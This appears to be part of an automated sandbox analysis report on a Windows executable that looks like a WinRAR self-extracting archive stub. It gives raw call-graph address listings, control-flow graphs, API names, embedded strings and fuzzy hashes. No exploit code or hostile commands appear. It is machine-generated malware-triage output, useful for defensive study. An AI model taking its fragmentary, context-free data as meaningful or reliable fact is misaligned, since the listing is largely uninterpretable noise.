22572->22576 22583 7ff70ecf4625 22572->22583 22573->22572 22575 7ff70ecf4925 22574->22575 22577 7ff70ecd1b70 31 API calls 22575->22577 22579 7ff70ecf3928 5 API calls 22576->22579 22578 7ff70ecf4931 22577->22578 22581 7ff70ecd1b70 31 API calls 22578->22581 22580 7ff70ecf4618 CloseHandle 22579->22580 22580->22583 22582 7ff70ecf493d 22581->22582 22584 7ff70ecd1b70 31 API calls 22582->22584 22585 7ff70ecf5c30 _handle_error 8 API calls 22583->22585 22584->22515 22586 7ff70ecf4672 22585->22586 22588 7ff70ecf6ad0 GetModuleHandleW 22586->22588 22587->22461 22588->22471 22589->22473 22590->22457 22591->22460 22593 7ff70ecf5fe6 __scrt_dllmain_crt_thread_attach 22592->22593 22593->22477 22593->22478 22595 7ff70ed041dc 22594->22595 22596 7ff70ecf5ff8 22595->22596 22599 7ff70ed02110 22595->22599 22596->22478 22598 7ff70ecf83e0 7 API calls 2 library calls 22596->22598 22598->22478 22610 7ff70ed02828 EnterCriticalSection 22599->22610 22612 7ff70ecf6aa3 GetStartupInfoW 22611->22612 22612->22464 22614 7ff70ed03bd9 22613->22614 22615 7ff70ed03bcd 22613->22615 22614->22487 22618 7ff70ed03a00 48 API calls 4 library calls 22615->22618 22617->22487 22618->22614 22693 7ff70ecddc4c 22619->22693 22621 7ff70eced0bd OleInitialize 22622 7ff70eced0e3 22621->22622 22623 7ff70eced109 SHGetMalloc 22622->22623 22623->22495 22625 7ff70eced759 22624->22625 22627 7ff70eced75e memcpy_s 22624->22627 22626 7ff70ecd1b70 31 API calls 22625->22626 22626->22627 22628 7ff70ecd1b70 31 API calls 22627->22628 22629 7ff70eced78d memcpy_s 22627->22629 22628->22629 22630 7ff70ecd1b70 31 API calls 22629->22630 22632 7ff70eced7bc memcpy_s 22629->22632 22630->22632 22631 7ff70ecd1b70 31 API calls 22633 7ff70eced7eb memcpy_s 22631->22633 22632->22631 22632->22633 22633->22497 22635 7ff70eceeb8e 22634->22635 22636 7ff70eceeb96 22634->22636 22811 7ff70ecec260 FindResourceW 22635->22811 22638 7ff70eceebb3 22636->22638 22639 7ff70eceeb9e GetObjectW 22636->22639 22640 7ff70ecec12c 4 API calls 22638->22640 22639->22638 22641 7ff70eceebc8 22640->22641 22642 7ff70eceec1e 22641->22642 22643 7ff70eceebee 22641->22643 22645 7ff70ecec260 10 API calls 22641->22645 22653 7ff70ecd9cac 22642->22653 22825 7ff70ecec194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22643->22825 22647 7ff70eceebda 22645->22647 22646 7ff70eceebf7 22648 7ff70ecec15c 4 API calls 22646->22648 22647->22643 22649 7ff70eceebe2 DeleteObject 22647->22649 22650 7ff70eceec02 22648->22650 22649->22643 22826 7ff70ececa30 16 API calls _handle_error 22650->22826 22652 7ff70eceec0f DeleteObject 22652->22642 22827 7ff70ecd9cdc 22653->22827 22655 7ff70ecd9cba 22894 7ff70ecda83c GetModuleHandleW FindResourceW 22655->22894 22657 7ff70ecd9cc2 22657->22531 22659 7ff70ecf5ae0 4 API calls 22658->22659 22660 7ff70ecea476 22659->22660 22660->22545 22662 7ff70ecedb0a 22661->22662 22680 7ff70ecedb76 22661->22680 22664 7ff70ecd12bc 33 API calls 22662->22664 22663 7ff70ecd1b70 31 API calls 22667 7ff70ecedb91 22663->22667 22665 7ff70ecedb34 22664->22665 22668 7ff70ecd8b28 47 API calls 22665->22668 22666 7ff70ecedcce 22669 7ff70ecf5c30 _handle_error 8 API calls 22666->22669 22667->22666 22670 7ff70ecd8cf8 SetCurrentDirectoryW 22667->22670 22672 7ff70ecedd01 22667->22672 22673 7ff70ecedb48 22668->22673 22674 7ff70ecedcdf 22669->22674 22671 7ff70ecedbec 22670->22671 22675 7ff70ecd2314 33 API calls 22671->22675 22676 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22672->22676 22917 7ff70ece0ad0 CompareStringW 22673->22917 22674->22565 22678 7ff70ecedc1b 22675->22678 22679 7ff70ecedd07 22676->22679 22681 7ff70ecedc26 22678->22681 22918 7ff70ecd1734 33 API calls 4 library calls 22678->22918 22680->22663 22680->22667 22682 7ff70ecedc55 SHFileOperationW 22681->22682 22682->22666 22684 7ff70ecedca1 22682->22684 22684->22666 22685 7ff70ecedcfc 22684->22685 22687->22516 22688->22539 22689->22547 22690->22554 22691->22560 22692->22542 22694 7ff70ecd13c4 33 API calls 22693->22694 22695 7ff70ecddc94 GetSystemDirectoryW 22694->22695 22696 7ff70ecddcb9 22695->22696 22714 7ff70ecddcb2 22695->22714 22699 7ff70ecd12bc 33 API calls 22696->22699 22697 7ff70ecdde4c 22698 7ff70ecf5c30 _handle_error 8 API calls 22697->22698 22701 7ff70ecdde60 22698->22701 22702 7ff70ecddcf1 22699->22702 22700 7ff70ecdde79 22703 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22700->22703 22701->22621 22705 7ff70ecd12bc 33 API calls 22702->22705 22704 7ff70ecdde7e 22703->22704 22706 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22704->22706 22707 7ff70ecddd19 22705->22707 22708 7ff70ecdde84 22706->22708 22709 7ff70ecd88f8 33 API calls 22707->22709 22710 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22708->22710 22713 7ff70ecddd2b 22709->22713 22712 7ff70ecdde8a 22710->22712 22711 7ff70ecdddb5 LoadLibraryExW 22711->22714 22715 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22712->22715 22713->22704 22713->22708 22713->22711 22714->22697 22714->22700 22714->22712 22716 7ff70ecdde90 _snwprintf 22715->22716 22717 7ff70ecddeb8 GetModuleHandleW 22716->22717 22718 7ff70ecddf3f 22717->22718 22719 7ff70ecddeea GetProcAddress 22717->22719 22722 7ff70ecde3c7 22718->22722 22802 7ff70ecfec3c 39 API calls _snwprintf 22718->22802 22720 7ff70ecddeff 22719->22720 22721 7ff70ecddf17 GetProcAddress 22719->22721 22720->22721 22721->22718 22724 7ff70ecddf2c 22721->22724 22723 7ff70ecd7c10 34 API calls 22722->22723 22726 7ff70ecde3d0 22723->22726 22724->22718 22728 7ff70ecd8b28 47 API calls 22726->22728 22727 7ff70ecde274 22727->22722 22729 7ff70ecde27e 22727->22729 22747 7ff70ecde3de 22728->22747 22730 7ff70ecd7c10 34 API calls 22729->22730 22731 7ff70ecde287 CreateFileW 22730->22731 22732 7ff70ecde3b4 CloseHandle 22731->22732 22733 7ff70ecde2c7 SetFilePointer 22731->22733 22736 7ff70ecd1b70 31 API calls 22732->22736 22733->22732 22735 7ff70ecde2e0 ReadFile 22733->22735 22734 7ff70ecd6768 9 API calls 22734->22747 22735->22732 22737 7ff70ecde308 22735->22737 22736->22722 22738 7ff70ecde6c4 22737->22738 22739 7ff70ecde31c 22737->22739 22808 7ff70ecf5df4 8 API calls 22738->22808 22744 7ff70ecd12bc 33 API calls 22739->22744 22740 7ff70ecddc4c 77 API calls 22740->22747 22742 7ff70ecde402 CompareStringW 22742->22747 22743 7ff70ecd12bc 33 API calls 22743->22747 22746 7ff70ecde353 22744->22746 22745 7ff70ecd8dc4 47 API calls 22745->22747 22756 7ff70ecde39f 22746->22756 22763 7ff70ecddc4c 77 API calls 22746->22763 22803 7ff70ecdcf98 33 API calls 22746->22803 22747->22734 22747->22740 22747->22742 22747->22743 22747->22745 22748 7ff70ecd1b70 31 API calls 22747->22748 22755 7ff70ecd5890 51 API calls 22747->22755 22785 7ff70ecde490 22747->22785 22748->22747 22750 7ff70ecde686 22754 7ff70ecd1b70 31 API calls 22750->22754 22751 7ff70ecde50c 22804 7ff70ecd8be4 47 API calls 22751->22804 22752 7ff70ecde6c9 22759 7ff70ecde6ef 22752->22759 22809 7ff70ecd3b84 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 22752->22809 22762 7ff70ecde68f 22754->22762 22755->22747 22757 7ff70ecd1b70 31 API calls 22756->22757 22764 7ff70ecde3a9 22757->22764 22760 7ff70ecde709 SetThreadExecutionState 22759->22760 22810 7ff70ecd3b84 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 22759->22810 22761 7ff70ecde515 22766 7ff70ecd6768 9 API calls 22761->22766 22768 7ff70ecd1b70 31 API calls 22762->22768 22763->22746 22769 7ff70ecd1b70 31 API calls 22764->22769 22770 7ff70ecde51a 22766->22770 22767 7ff70ecd12bc 33 API calls 22767->22785 22771 7ff70ecde699 22768->22771 22769->22732 22772 7ff70ecde525 22770->22772 22773 7ff70ecde5ca 22770->22773 22775 7ff70ecf5c30 _handle_error 8 API calls 22771->22775 22776 7ff70ecddc4c 77 API calls 22772->22776 22777 7ff70ecdda04 48 API calls 22773->22777 22774 7ff70ecd8dc4 47 API calls 22774->22785 22778 7ff70ecde6a8 22775->22778 22779 7ff70ecde531 22776->22779 22780 7ff70ecde60f AllocConsole 22777->22780 22778->22621 22782 7ff70ecddc4c 77 API calls 22779->22782 22783 7ff70ecde5bf 22780->22783 22784 7ff70ecde619 GetCurrentProcessId AttachConsole 22780->22784 22781 7ff70ecd1b70 31 API calls 22781->22785 22786 7ff70ecde53d 22782->22786 22807 7ff70ecd19d0 31 API calls _invalid_parameter_noinfo_noreturn 22783->22807 22787 7ff70ecde630 22784->22787 22785->22767 22785->22774 22785->22781 22788 7ff70ecd5890 51 API calls 22785->22788 22793 7ff70ecde4fe 22785->22793 22790 7ff70ecdaee0 48 API calls 22786->22790 22795 7ff70ecde63c GetStdHandle WriteConsoleW Sleep FreeConsole 22787->22795 22788->22785 22792 7ff70ecde569 22790->22792 22791 7ff70ecde67d ExitProcess 22794 7ff70ecdda04 48 API calls 22792->22794 22793->22750 22793->22751 22796 7ff70ecde587 22794->22796 22795->22783 22797 7ff70ecdaee0 48 API calls 22796->22797 22798 7ff70ecde592 22797->22798 22805 7ff70ecddb98 33 API calls 22798->22805 22800 7ff70ecde59e 22806 7ff70ecd19d0 31 API calls _invalid_parameter_noinfo_noreturn 22800->22806 22802->22727 22803->22746 22804->22761 22805->22800 22806->22783 22807->22791 22808->22752 22809->22759 22810->22760 22812 7ff70ecec3d7 22811->22812 22813 7ff70ecec28b SizeofResource 22811->22813 22812->22636 22813->22812 22814 7ff70ecec2a5 LoadResource 22813->22814 22814->22812 22815 7ff70ecec2be LockResource 22814->22815 22815->22812 22816 7ff70ecec2d3 GlobalAlloc 22815->22816 22816->22812 22817 7ff70ecec2f4 GlobalLock 22816->22817 22818 7ff70ecec3ce GlobalFree 22817->22818 22819 7ff70ecec306 memcpy_s 22817->22819 22818->22812 22820 7ff70ecec314 CreateStreamOnHGlobal 22819->22820 22821 7ff70ecec3c5 GlobalUnlock 22820->22821 22822 7ff70ecec332 22820->22822 22821->22818 22822->22821 22823 7ff70ecec396 GdipCreateHBITMAPFromBitmap 22822->22823 22824 7ff70ecec3ae 22822->22824 22823->22824 22824->22821 22825->22646 22826->22652 22830 7ff70ecd9cfe _snwprintf 22827->22830 22828 7ff70ecd9d73 22904 7ff70ecd806c 48 API calls 22828->22904 22830->22828 22832 7ff70ecd9e89 22830->22832 22831 7ff70ecd1b70 31 API calls 22833 7ff70ecd9dfd 22831->22833 22832->22833 22836 7ff70ecd1c80 33 API calls 22832->22836 22838 7ff70ecd46a0 54 API calls 22833->22838 22834 7ff70ecd9d7d memcpy_s 22834->22831 22835 7ff70ecda82e 22834->22835 22837 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22835->22837 22836->22833 22839 7ff70ecda834 22837->22839 22840 7ff70ecd9e1a 22838->22840 22842 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22839->22842 22841 7ff70ecd9e22 22840->22841 22850 7ff70ecd9ead 22840->22850 22843 7ff70ecd424c 100 API calls 22841->22843 22845 7ff70ecda83a 22842->22845 22847 7ff70ecd9e2b 22843->22847 22844 7ff70ecd9f17 22896 7ff70ecfd800 22844->22896 22847->22839 22849 7ff70ecd9e66 22847->22849 22852 7ff70ecf5c30 _handle_error 8 API calls 22849->22852 22850->22844 22854 7ff70ecd9254 33 API calls 22850->22854 22851 7ff70ecfd800 31 API calls 22865 7ff70ecd9f57 __vcrt_FlsAlloc 22851->22865 22853 7ff70ecda80e 22852->22853 22853->22655 22854->22850 22855 7ff70ecda089 22856 7ff70ecd4c40 101 API calls 22855->22856 22868 7ff70ecda15c 22855->22868 22859 7ff70ecda0a1 22856->22859 22857 7ff70ecd4d50 101 API calls 22857->22865 22858 7ff70ecd4a70 104 API calls 22858->22865 22862 7ff70ecd4a70 104 API calls 22859->22862 22859->22868 22860 7ff70ecd424c 100 API calls 22863 7ff70ecda7f5 22860->22863 22861 7ff70ecd4c40 101 API calls 22861->22865 22866 7ff70ecda0c9 22862->22866 22864 7ff70ecd1b70 31 API calls 22863->22864 22864->22849 22865->22855 22865->22857 22865->22858 22865->22861 22865->22868 22866->22868 22888 7ff70ecda0d7 __vcrt_FlsAlloc 22866->22888 22905 7ff70ece033c MultiByteToWideChar 22866->22905 22868->22860 22869 7ff70ecda5ec 22882 7ff70ecda6c2 22869->22882 22911 7ff70ed00498 31 API calls 2 library calls 22869->22911 22871 7ff70ecda557 22871->22869 22908 7ff70ed00498 31 API calls 2 library calls 22871->22908 22872 7ff70ecda54b 22872->22655 22875 7ff70ecda7a2 22878 7ff70ecfd800 31 API calls 22875->22878 22876 7ff70ecda649 22912 7ff70ecfecc4 31 API calls _invalid_parameter_noinfo_noreturn 22876->22912 22877 7ff70ecda6ae 22877->22882 22913 7ff70ecd90cc 33 API calls Concurrency::cancel_current_task 22877->22913 22880 7ff70ecda7cb 22878->22880 22884 7ff70ecfd800 31 API calls 22880->22884 22882->22875 22886 7ff70ecd9254 33 API calls 22882->22886 22883 7ff70ecda56d 22909 7ff70ecfecc4 31 API calls _invalid_parameter_noinfo_noreturn 22883->22909 22884->22868 22885 7ff70ecda5d8 22885->22869 22910 7ff70ecd90cc 33 API calls Concurrency::cancel_current_task 22885->22910 22886->22882 22888->22868 22888->22869 22888->22871 22888->22872 22889 7ff70ecda829 22888->22889 22891 7ff70ece0688 WideCharToMultiByte 22888->22891 22906 7ff70ecdae88 45 API calls _snwprintf 22888->22906 22907 7ff70ecfd62c 31 API calls 2 library calls 22888->22907 22914 7ff70ecf5df4 8 API calls 22889->22914 22891->22888 22895 7ff70ecda868 22894->22895 22895->22657 22897 7ff70ecfd82d 22896->22897 22903 7ff70ecfd842 22897->22903 22915 7ff70ed00bac 15 API calls abort 22897->22915 22899 7ff70ecfd837 22916 7ff70ecfae74 31 API calls _invalid_parameter_noinfo_noreturn 22899->22916 22901 7ff70ecf5c30 _handle_error 8 API calls 22902 7ff70ecd9f37 22901->22902 22902->22851 22903->22901 22904->22834 22905->22888 22906->22888 22907->22888 22908->22883 22909->22885 22910->22869 22911->22876 22912->22877 22913->22882 22914->22835 22915->22899 22916->22903 22917->22680 22918->22682

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00007FF70ECDDC4C Relevance: 154.6, APIs: 22, Strings: 66, Instructions: 610libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 7ff70ecddc4c-7ff70ecddcb0 call 7ff70ecd13c4 GetSystemDirectoryW 3 7ff70ecddcb2-7ff70ecddcb4 0->3 4 7ff70ecddcb9-7ff70ecddd34 call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecd88f8 0->4 5 7ff70ecdde19-7ff70ecdde20 3->5 31 7ff70ecddd36-7ff70ecddd48 4->31 32 7ff70ecddd68-7ff70ecddd81 4->32 8 7ff70ecdde22-7ff70ecdde35 5->8 9 7ff70ecdde51-7ff70ecdde78 call 7ff70ecf5c30 5->9 12 7ff70ecdde4c call 7ff70ecf5b1c 8->12 13 7ff70ecdde37-7ff70ecdde4a 8->13 12->9 13->12 14 7ff70ecdde79-7ff70ecdde7e call 7ff70ecfae94 13->14 22 7ff70ecdde7f-7ff70ecdde84 call 7ff70ecfae94 14->22 28 7ff70ecdde85-7ff70ecdde8a call 7ff70ecfae94 22->28 43 7ff70ecdde8b-7ff70ecddee8 call 7ff70ecfae94 call 7ff70ecf5c90 GetModuleHandleW 28->43 36 7ff70ecddd63 call 7ff70ecf5b1c 31->36 37 7ff70ecddd4a-7ff70ecddd5d 31->37 33 7ff70ecddd83-7ff70ecddd95 32->33 34 7ff70ecdddb5-7ff70ecdddd4 LoadLibraryExW 32->34 39 7ff70ecdddb0 call 7ff70ecf5b1c 33->39 40 7ff70ecddd97-7ff70ecdddaa 33->40 41 7ff70ecdddd6-7ff70ecddde8 34->41 42 7ff70ecdde08-7ff70ecdde15 34->42 36->32 37->22 37->36 39->34 40->28 40->39 45 7ff70ecdde03 call 7ff70ecf5b1c 41->45 46 7ff70ecdddea-7ff70ecdddfd 41->46 42->5 53 7ff70ecddf3f-7ff70ecde269 43->53 54 7ff70ecddeea-7ff70ecddefd GetProcAddress 43->54 45->42 46->43 46->45 57 7ff70ecde26f-7ff70ecde278 call 7ff70ecfec3c 53->57 58 7ff70ecde3c7-7ff70ecde3e5 call 7ff70ecd7c10 call 7ff70ecd8b28 53->58 55 7ff70ecddeff-7ff70ecddf0e 54->55 56 7ff70ecddf17-7ff70ecddf2a GetProcAddress 54->56 55->56 56->53 60 7ff70ecddf2c-7ff70ecddf3c 56->60 57->58 66 7ff70ecde27e-7ff70ecde2c1 call 7ff70ecd7c10 CreateFileW 57->66 70 7ff70ecde3e9-7ff70ecde3f3 call 7ff70ecd6768 58->70 60->53 71 7ff70ecde3b4-7ff70ecde3c2 CloseHandle call 7ff70ecd1b70 66->71 72 7ff70ecde2c7-7ff70ecde2da SetFilePointer 66->72 78 7ff70ecde3f5-7ff70ecde400 call 7ff70ecddc4c 70->78 79 7ff70ecde428-7ff70ecde470 call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecd8dc4 call 7ff70ecd1b70 call 7ff70ecd5890 70->79 71->58 72->71 74 7ff70ecde2e0-7ff70ecde302 ReadFile 72->74 74->71 77 7ff70ecde308-7ff70ecde316 74->77 81 7ff70ecde6c4-7ff70ecde6dc call 7ff70ecf5df4 call 7ff70ece0100 call 7ff70ece0108 77->81 82 7ff70ecde31c-7ff70ecde370 call 7ff70ecfaf0c call 7ff70ecd12bc 77->82 78->79 88 7ff70ecde402-7ff70ecde426 CompareStringW 78->88 130 7ff70ecde475-7ff70ecde478 79->130 115 7ff70ecde6ef-7ff70ecde6f6 81->115 116 7ff70ecde6de-7ff70ecde6ea call 7ff70ecd3b84 81->116 101 7ff70ecde387-7ff70ecde39d call 7ff70ecdcf98 82->101 88->79 92 7ff70ecde481-7ff70ecde48a 88->92 92->70 99 7ff70ecde490 92->99 103 7ff70ecde495-7ff70ecde498 99->103 121 7ff70ecde39f-7ff70ecde3af call 7ff70ecd1b70 * 2 101->121 122 7ff70ecde372-7ff70ecde382 call 7ff70ecddc4c 101->122 104 7ff70ecde503-7ff70ecde506 103->104 105 7ff70ecde49a-7ff70ecde49d 103->105 109 7ff70ecde686-7ff70ecde6c3 call 7ff70ecd1b70 * 2 call 7ff70ecf5c30 104->109 110 7ff70ecde50c-7ff70ecde51f call 7ff70ecd8be4 call 7ff70ecd6768 104->110 111 7ff70ecde4a1-7ff70ecde4f1 call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecd8dc4 call 7ff70ecd1b70 call 7ff70ecd5890 105->111 143 7ff70ecde525-7ff70ecde5c5 call 7ff70ecddc4c * 2 call 7ff70ecdaee0 call 7ff70ecdda04 call 7ff70ecdaee0 call 7ff70ecddb98 call 7ff70ecec3e8 call 7ff70ecd19d0 110->143 144 7ff70ecde5ca-7ff70ecde617 call 7ff70ecdda04 AllocConsole 110->144 169 7ff70ecde4f3-7ff70ecde4fc 111->169 170 7ff70ecde500 111->170 125 7ff70ecde6f8-7ff70ecde704 call 7ff70ecd3b84 115->125 126 7ff70ecde709-7ff70ecde712 SetThreadExecutionState 115->126 116->115 121->71 122->101 125->126 137 7ff70ecde492 130->137 138 7ff70ecde47a 130->138 137->103 138->92 158 7ff70ecde678-7ff70ecde67f call 7ff70ecd19d0 ExitProcess 143->158 155 7ff70ecde674 144->155 156 7ff70ecde619-7ff70ecde66e GetCurrentProcessId AttachConsole call 7ff70ecde72c call 7ff70ecde71c GetStdHandle WriteConsoleW Sleep FreeConsole 144->156 155->158 156->155 169->111 173 7ff70ecde4fe 169->173 170->104 173->104
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
                                                                                                                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                                                          • API String ID: 751436351-2013832382
                                                                                                                                                                          • Opcode ID: 5ec89f6802affc2948b8ee13fc3eda9d2508545244b2c8bba0ddb447261d35e8
                                                                                                                                                                          • Instruction ID: 9b323a32f199ec976349c83822a011bfc4d48e3138b852d255c13912d3ef2259
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ec89f6802affc2948b8ee13fc3eda9d2508545244b2c8bba0ddb447261d35e8
                                                                                                                                                                          • Instruction Fuzzy Hash: E8623D32A1DB82A9EB11AB64EC402EEB364FF44354F944236DA4D477A5EF3ED244C360
                                                                                                                                                                          Function 00007FF70ECEECE0 Relevance: 125.7, APIs: 61, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWait
                                                                                                                                                                          • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                                                                                                          • API String ID: 2514108016-2702805183
                                                                                                                                                                          • Opcode ID: 656f4d71f1355d92385f88fb14d0a5aa5a8e80a74f0fc3a42f07c745783969ed
                                                                                                                                                                          • Instruction ID: 549c47aa3b431029c806d6c4cd3e9bd271a15d816c8174cea885738a1437412c
                                                                                                                                                                          • Opcode Fuzzy Hash: 656f4d71f1355d92385f88fb14d0a5aa5a8e80a74f0fc3a42f07c745783969ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 24D29162B0D782A5EA20BB25EC542FAE361EF85784FC04136D98D477A6DF3EE544C720
                                                                                                                                                                          Function 00007FF70ECF09D8 Relevance: 66.7, APIs: 27, Strings: 10, Instructions: 1963windowfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$MessageMoveSend$DialogItemOperationPathTemp
                                                                                                                                                                          • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                                                                                                          • API String ID: 2933078328-3916287355
                                                                                                                                                                          • Opcode ID: 55dfa35ca51e5714cd7530dcbfea3c77453af1272171f684410000b67e8c5d25
                                                                                                                                                                          • Instruction ID: bb94bd1296644117aa06638196ea7da0a5f2a9f3c810139d59475db85e10e52f
                                                                                                                                                                          • Opcode Fuzzy Hash: 55dfa35ca51e5714cd7530dcbfea3c77453af1272171f684410000b67e8c5d25
                                                                                                                                                                          • Instruction Fuzzy Hash: A713D372B08782A9EB10EF64DC502EE67B1EF40798F941136DA4D17AEADF39D584C360
                                                                                                                                                                          Function 00007FF70ECF400C Relevance: 47.8, APIs: 22, Strings: 5, Instructions: 539filesleeptimeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
